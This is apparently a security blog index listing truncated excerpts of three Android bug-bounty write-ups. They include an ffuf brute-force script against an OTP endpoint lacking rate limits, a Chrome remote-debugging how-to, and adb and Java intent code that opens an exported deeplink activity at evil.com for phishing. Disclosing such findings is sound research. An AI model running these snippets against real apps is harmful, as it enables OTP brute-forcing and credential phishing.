balooz@home:~$

  • Android No Rate Limiting Leads To Sms Brute Force

    Android No Rate Limiting Leads to Mass SMS Brute-Force Endpoint Requesting an otp but problem is there is no rate limiting. We can request unlimited otp’s. I crafted A ffuf Request to make it fast and easier Exploit.sh #! /bin/bash seq 1 9999 | ffuf -u https://sub.redacted.com/api/v2/otp \ -H 'accessToken:9CaeE1dbeMDfUw...'...

  • Android Chrome Remote Debugging

    Android chrome remote debugging Install chrome on Android connect to the android from pc through adb you can connect throuh wireless or wired way (usb cabl3) Install adb root apk to connect in a wireless way (requires root) adb connect 192.168.0.100 From pc navigate to chrome://inspect From Android browse any...

  • Android App Loading Arbitrary Url Leads To Xss And Phishing

    The app can be launched by any other app because its deeplink activity is exported=true. Adb exploit adb shell am start -a android.intent.action.VIEW -n com.redacted.android/"com.redacted.activities.DeepLinkActivity" -d "https://evil.com" Apk Exploit Intent intent = new Intent(); intent.setClassName("com.redacted.android","com.redcated.android.activities.DeepLinkActivity"); intent.setData(Uri.parse("https://evil.com")); startActivity(intent); Impact The attcker can craft a phishing page and grab the credentails. or...